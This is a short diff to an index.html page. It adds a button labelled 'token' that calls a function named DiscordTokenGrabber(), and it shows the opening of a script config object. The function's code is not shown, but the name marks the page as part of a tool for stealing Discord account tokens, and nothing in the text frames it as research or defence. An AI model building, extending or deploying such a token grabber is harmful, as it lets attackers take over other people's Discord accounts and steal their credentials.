--- a/index.html
+++ b/index.html
@@ -2,7 +2,9 @@
 <html>
 <meta charset="UTF-8">
 <body>
-
+    
+<button type="button" onclick="DiscordTokenGrabber()">token</button>
+    
 <script>
 const config = {
     "info": {
